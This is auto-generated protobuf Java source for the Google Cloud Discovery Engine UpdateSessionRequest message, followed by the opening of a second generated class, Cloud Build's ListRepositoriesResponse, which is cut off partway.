/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/discoveryengine/v1beta/conversational_search_service.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.discoveryengine.v1beta; /** * * * <pre> * Request for UpdateSession method. * </pre> * * Protobuf type {@code google.cloud.discoveryengine.v1beta.UpdateSessionRequest} */ public final class UpdateSessionRequest extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.discoveryengine.v1beta.UpdateSessionRequest) UpdateSessionRequestOrBuilder { private static final long serialVersionUID = 0L; // Use UpdateSessionRequest.newBuilder() to construct. private UpdateSessionRequest(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private UpdateSessionRequest() {} @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new UpdateSessionRequest(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.discoveryengine.v1beta.ConversationalSearchServiceProto .internal_static_google_cloud_discoveryengine_v1beta_UpdateSessionRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.discoveryengine.v1beta.ConversationalSearchServiceProto .internal_static_google_cloud_discoveryengine_v1beta_UpdateSessionRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest.class, com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest.Builder.class); } private int bitField0_; public static final int SESSION_FIELD_NUMBER = 1; private com.google.cloud.discoveryengine.v1beta.Session session_; /** * * * <pre> * Required. The Session to update. * </pre> * * <code> * .google.cloud.discoveryengine.v1beta.Session session = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return Whether the session field is set. */ @java.lang.Override public boolean hasSession() { return ((bitField0_ & 0x00000001) != 0); } /** * * * <pre> * Required. The Session to update. * </pre> * * <code> * .google.cloud.discoveryengine.v1beta.Session session = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return The session. */ @java.lang.Override public com.google.cloud.discoveryengine.v1beta.Session getSession() { return session_ == null ? com.google.cloud.discoveryengine.v1beta.Session.getDefaultInstance() : session_; } /** * * * <pre> * Required. The Session to update. * </pre> * * <code> * .google.cloud.discoveryengine.v1beta.Session session = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ @java.lang.Override public com.google.cloud.discoveryengine.v1beta.SessionOrBuilder getSessionOrBuilder() { return session_ == null ? com.google.cloud.discoveryengine.v1beta.Session.getDefaultInstance() : session_; } public static final int UPDATE_MASK_FIELD_NUMBER = 2; private com.google.protobuf.FieldMask updateMask_; /** * * * <pre> * Indicates which fields in the provided * [Session][google.cloud.discoveryengine.v1beta.Session] to update. The * following are NOT supported: * * * [Session.name][google.cloud.discoveryengine.v1beta.Session.name] * * If not set or empty, all supported fields are updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * * @return Whether the updateMask field is set. */ @java.lang.Override public boolean hasUpdateMask() { return ((bitField0_ & 0x00000002) != 0); } /** * * * <pre> * Indicates which fields in the provided * [Session][google.cloud.discoveryengine.v1beta.Session] to update. The * following are NOT supported: * * * [Session.name][google.cloud.discoveryengine.v1beta.Session.name] * * If not set or empty, all supported fields are updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * * @return The updateMask. */ @java.lang.Override public com.google.protobuf.FieldMask getUpdateMask() { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } /** * * * <pre> * Indicates which fields in the provided * [Session][google.cloud.discoveryengine.v1beta.Session] to update. The * following are NOT supported: * * * [Session.name][google.cloud.discoveryengine.v1beta.Session.name] * * If not set or empty, all supported fields are updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ @java.lang.Override public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (((bitField0_ & 0x00000001) != 0)) { output.writeMessage(1, getSession()); } if (((bitField0_ & 0x00000002) != 0)) { output.writeMessage(2, getUpdateMask()); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(1, getSession()); } if (((bitField0_ & 0x00000002) != 0)) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(2, getUpdateMask()); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest)) { return super.equals(obj); } com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest other = (com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest) obj; if (hasSession() != other.hasSession()) return false; if (hasSession()) { if (!getSession().equals(other.getSession())) return false; } if (hasUpdateMask() != other.hasUpdateMask()) return false; if (hasUpdateMask()) { if (!getUpdateMask().equals(other.getUpdateMask())) return false; } if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (hasSession()) { hash = (37 * hash) + SESSION_FIELD_NUMBER; hash = (53 * hash) + getSession().hashCode(); } if (hasUpdateMask()) { hash = (37 * hash) + UPDATE_MASK_FIELD_NUMBER; hash = (53 * hash) + getUpdateMask().hashCode(); } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Request for UpdateSession method. * </pre> * * Protobuf type {@code google.cloud.discoveryengine.v1beta.UpdateSessionRequest} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.discoveryengine.v1beta.UpdateSessionRequest) com.google.cloud.discoveryengine.v1beta.UpdateSessionRequestOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.discoveryengine.v1beta.ConversationalSearchServiceProto .internal_static_google_cloud_discoveryengine_v1beta_UpdateSessionRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.discoveryengine.v1beta.ConversationalSearchServiceProto .internal_static_google_cloud_discoveryengine_v1beta_UpdateSessionRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest.class, com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest.Builder.class); } // Construct using com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) { getSessionFieldBuilder(); getUpdateMaskFieldBuilder(); } } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; session_ = null; if (sessionBuilder_ != null) { sessionBuilder_.dispose(); sessionBuilder_ = null; } updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.discoveryengine.v1beta.ConversationalSearchServiceProto .internal_static_google_cloud_discoveryengine_v1beta_UpdateSessionRequest_descriptor; } @java.lang.Override public com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest getDefaultInstanceForType() { return com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest.getDefaultInstance(); } @java.lang.Override public com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest build() { com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest buildPartial() { com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest result = new com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0( com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest result) { int from_bitField0_ = bitField0_; int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000001) != 0)) { result.session_ = sessionBuilder_ == null ? session_ : sessionBuilder_.build(); to_bitField0_ |= 0x00000001; } if (((from_bitField0_ & 0x00000002) != 0)) { result.updateMask_ = updateMaskBuilder_ == null ? updateMask_ : updateMaskBuilder_.build(); to_bitField0_ |= 0x00000002; } result.bitField0_ |= to_bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest) { return mergeFrom((com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest other) { if (other == com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest.getDefaultInstance()) return this; if (other.hasSession()) { mergeSession(other.getSession()); } if (other.hasUpdateMask()) { mergeUpdateMask(other.getUpdateMask()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { input.readMessage(getSessionFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000001; break; } // case 10 case 18: { input.readMessage(getUpdateMaskFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000002; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private com.google.cloud.discoveryengine.v1beta.Session session_; private com.google.protobuf.SingleFieldBuilderV3< com.google.cloud.discoveryengine.v1beta.Session, com.google.cloud.discoveryengine.v1beta.Session.Builder, com.google.cloud.discoveryengine.v1beta.SessionOrBuilder> sessionBuilder_; /** * * * <pre> * Required. The Session to update. * </pre> * * <code> * .google.cloud.discoveryengine.v1beta.Session session = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return Whether the session field is set. */ public boolean hasSession() { return ((bitField0_ & 0x00000001) != 0); } /** * * * <pre> * Required. The Session to update. * </pre> * * <code> * .google.cloud.discoveryengine.v1beta.Session session = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return The session. */ public com.google.cloud.discoveryengine.v1beta.Session getSession() { if (sessionBuilder_ == null) { return session_ == null ? com.google.cloud.discoveryengine.v1beta.Session.getDefaultInstance() : session_; } else { return sessionBuilder_.getMessage(); } } /** * * * <pre> * Required. The Session to update. * </pre> * * <code> * .google.cloud.discoveryengine.v1beta.Session session = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder setSession(com.google.cloud.discoveryengine.v1beta.Session value) { if (sessionBuilder_ == null) { if (value == null) { throw new NullPointerException(); } session_ = value; } else { sessionBuilder_.setMessage(value); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Required. The Session to update. * </pre> * * <code> * .google.cloud.discoveryengine.v1beta.Session session = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder setSession( com.google.cloud.discoveryengine.v1beta.Session.Builder builderForValue) { if (sessionBuilder_ == null) { session_ = builderForValue.build(); } else { sessionBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Required. The Session to update. * </pre> * * <code> * .google.cloud.discoveryengine.v1beta.Session session = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder mergeSession(com.google.cloud.discoveryengine.v1beta.Session value) { if (sessionBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0) && session_ != null && session_ != com.google.cloud.discoveryengine.v1beta.Session.getDefaultInstance()) { getSessionBuilder().mergeFrom(value); } else { session_ = value; } } else { sessionBuilder_.mergeFrom(value); } if (session_ != null) { bitField0_ |= 0x00000001; onChanged(); } return this; } /** * * * <pre> * Required. The Session to update. * </pre> * * <code> * .google.cloud.discoveryengine.v1beta.Session session = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder clearSession() { bitField0_ = (bitField0_ & ~0x00000001); session_ = null; if (sessionBuilder_ != null) { sessionBuilder_.dispose(); sessionBuilder_ = null; } onChanged(); return this; } /** * * * <pre> * Required. The Session to update. * </pre> * * <code> * .google.cloud.discoveryengine.v1beta.Session session = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.cloud.discoveryengine.v1beta.Session.Builder getSessionBuilder() { bitField0_ |= 0x00000001; onChanged(); return getSessionFieldBuilder().getBuilder(); } /** * * * <pre> * Required. The Session to update. * </pre> * * <code> * .google.cloud.discoveryengine.v1beta.Session session = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.cloud.discoveryengine.v1beta.SessionOrBuilder getSessionOrBuilder() { if (sessionBuilder_ != null) { return sessionBuilder_.getMessageOrBuilder(); } else { return session_ == null ? com.google.cloud.discoveryengine.v1beta.Session.getDefaultInstance() : session_; } } /** * * * <pre> * Required. The Session to update. * </pre> * * <code> * .google.cloud.discoveryengine.v1beta.Session session = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.cloud.discoveryengine.v1beta.Session, com.google.cloud.discoveryengine.v1beta.Session.Builder, com.google.cloud.discoveryengine.v1beta.SessionOrBuilder> getSessionFieldBuilder() { if (sessionBuilder_ == null) { sessionBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.cloud.discoveryengine.v1beta.Session, com.google.cloud.discoveryengine.v1beta.Session.Builder, com.google.cloud.discoveryengine.v1beta.SessionOrBuilder>( getSession(), getParentForChildren(), isClean()); session_ = null; } return sessionBuilder_; } private com.google.protobuf.FieldMask updateMask_; private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> updateMaskBuilder_; /** * * * <pre> * Indicates which fields in the provided * [Session][google.cloud.discoveryengine.v1beta.Session] to update. The * following are NOT supported: * * * [Session.name][google.cloud.discoveryengine.v1beta.Session.name] * * If not set or empty, all supported fields are updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * * @return Whether the updateMask field is set. */ public boolean hasUpdateMask() { return ((bitField0_ & 0x00000002) != 0); } /** * * * <pre> * Indicates which fields in the provided * [Session][google.cloud.discoveryengine.v1beta.Session] to update. The * following are NOT supported: * * * [Session.name][google.cloud.discoveryengine.v1beta.Session.name] * * If not set or empty, all supported fields are updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * * @return The updateMask. */ public com.google.protobuf.FieldMask getUpdateMask() { if (updateMaskBuilder_ == null) { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } else { return updateMaskBuilder_.getMessage(); } } /** * * * <pre> * Indicates which fields in the provided * [Session][google.cloud.discoveryengine.v1beta.Session] to update. The * following are NOT supported: * * * [Session.name][google.cloud.discoveryengine.v1beta.Session.name] * * If not set or empty, all supported fields are updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder setUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (value == null) { throw new NullPointerException(); } updateMask_ = value; } else { updateMaskBuilder_.setMessage(value); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Indicates which fields in the provided * [Session][google.cloud.discoveryengine.v1beta.Session] to update. The * following are NOT supported: * * * [Session.name][google.cloud.discoveryengine.v1beta.Session.name] * * If not set or empty, all supported fields are updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder setUpdateMask(com.google.protobuf.FieldMask.Builder builderForValue) { if (updateMaskBuilder_ == null) { updateMask_ = builderForValue.build(); } else { updateMaskBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Indicates which fields in the provided * [Session][google.cloud.discoveryengine.v1beta.Session] to update. The * following are NOT supported: * * * [Session.name][google.cloud.discoveryengine.v1beta.Session.name] * * If not set or empty, all supported fields are updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder mergeUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (((bitField0_ & 0x00000002) != 0) && updateMask_ != null && updateMask_ != com.google.protobuf.FieldMask.getDefaultInstance()) { getUpdateMaskBuilder().mergeFrom(value); } else { updateMask_ = value; } } else { updateMaskBuilder_.mergeFrom(value); } if (updateMask_ != null) { bitField0_ |= 0x00000002; onChanged(); } return this; } /** * * * <pre> * Indicates which fields in the provided * [Session][google.cloud.discoveryengine.v1beta.Session] to update. The * following are NOT supported: * * * [Session.name][google.cloud.discoveryengine.v1beta.Session.name] * * If not set or empty, all supported fields are updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder clearUpdateMask() { bitField0_ = (bitField0_ & ~0x00000002); updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } onChanged(); return this; } /** * * * <pre> * Indicates which fields in the provided * [Session][google.cloud.discoveryengine.v1beta.Session] to update. The * following are NOT supported: * * * [Session.name][google.cloud.discoveryengine.v1beta.Session.name] * * If not set or empty, all supported fields are updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public com.google.protobuf.FieldMask.Builder getUpdateMaskBuilder() { bitField0_ |= 0x00000002; onChanged(); return getUpdateMaskFieldBuilder().getBuilder(); } /** * * * <pre> * Indicates which fields in the provided * [Session][google.cloud.discoveryengine.v1beta.Session] to update. The * following are NOT supported: * * * [Session.name][google.cloud.discoveryengine.v1beta.Session.name] * * If not set or empty, all supported fields are updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { if (updateMaskBuilder_ != null) { return updateMaskBuilder_.getMessageOrBuilder(); } else { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } } /** * * * <pre> * Indicates which fields in the provided * [Session][google.cloud.discoveryengine.v1beta.Session] to update. The * following are NOT supported: * * * [Session.name][google.cloud.discoveryengine.v1beta.Session.name] * * If not set or empty, all supported fields are updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> getUpdateMaskFieldBuilder() { if (updateMaskBuilder_ == null) { updateMaskBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder>( getUpdateMask(), getParentForChildren(), isClean()); updateMask_ = null; } return updateMaskBuilder_; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.discoveryengine.v1beta.UpdateSessionRequest) } // @@protoc_insertion_point(class_scope:google.cloud.discoveryengine.v1beta.UpdateSessionRequest) private static final com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest(); } public static com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<UpdateSessionRequest> PARSER = new com.google.protobuf.AbstractParser<UpdateSessionRequest>() { @java.lang.Override public UpdateSessionRequest parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<UpdateSessionRequest> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<UpdateSessionRequest> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleapis/google-cloud-java
35,817
java-cloudbuild/proto-google-cloud-build-v2/src/main/java/com/google/cloudbuild/v2/ListRepositoriesResponse.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/devtools/cloudbuild/v2/repositories.proto // Protobuf Java Version: 3.25.8 package com.google.cloudbuild.v2; /** * * * <pre> * Message for response to listing Repositories. * </pre> * * Protobuf type {@code google.devtools.cloudbuild.v2.ListRepositoriesResponse} */ public final class ListRepositoriesResponse extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.devtools.cloudbuild.v2.ListRepositoriesResponse) ListRepositoriesResponseOrBuilder { private static final long serialVersionUID = 0L; // Use ListRepositoriesResponse.newBuilder() to construct. private ListRepositoriesResponse(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private ListRepositoriesResponse() { repositories_ = java.util.Collections.emptyList(); nextPageToken_ = ""; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new ListRepositoriesResponse(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloudbuild.v2.RepositoryManagerProto .internal_static_google_devtools_cloudbuild_v2_ListRepositoriesResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloudbuild.v2.RepositoryManagerProto .internal_static_google_devtools_cloudbuild_v2_ListRepositoriesResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloudbuild.v2.ListRepositoriesResponse.class, com.google.cloudbuild.v2.ListRepositoriesResponse.Builder.class); } public static final int REPOSITORIES_FIELD_NUMBER = 1; @SuppressWarnings("serial") private java.util.List<com.google.cloudbuild.v2.Repository> repositories_; /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ @java.lang.Override public java.util.List<com.google.cloudbuild.v2.Repository> getRepositoriesList() { return repositories_; } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ @java.lang.Override public java.util.List<? extends com.google.cloudbuild.v2.RepositoryOrBuilder> getRepositoriesOrBuilderList() { return repositories_; } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ @java.lang.Override public int getRepositoriesCount() { return repositories_.size(); } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ @java.lang.Override public com.google.cloudbuild.v2.Repository getRepositories(int index) { return repositories_.get(index); } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ @java.lang.Override public com.google.cloudbuild.v2.RepositoryOrBuilder getRepositoriesOrBuilder(int index) { return repositories_.get(index); } public static final int NEXT_PAGE_TOKEN_FIELD_NUMBER = 2; @SuppressWarnings("serial") private volatile java.lang.Object nextPageToken_ = ""; /** * * * <pre> * A token identifying a page of results the server should return. * </pre> * * <code>string next_page_token = 2;</code> * * @return The nextPageToken. */ @java.lang.Override public java.lang.String getNextPageToken() { java.lang.Object ref = nextPageToken_; if 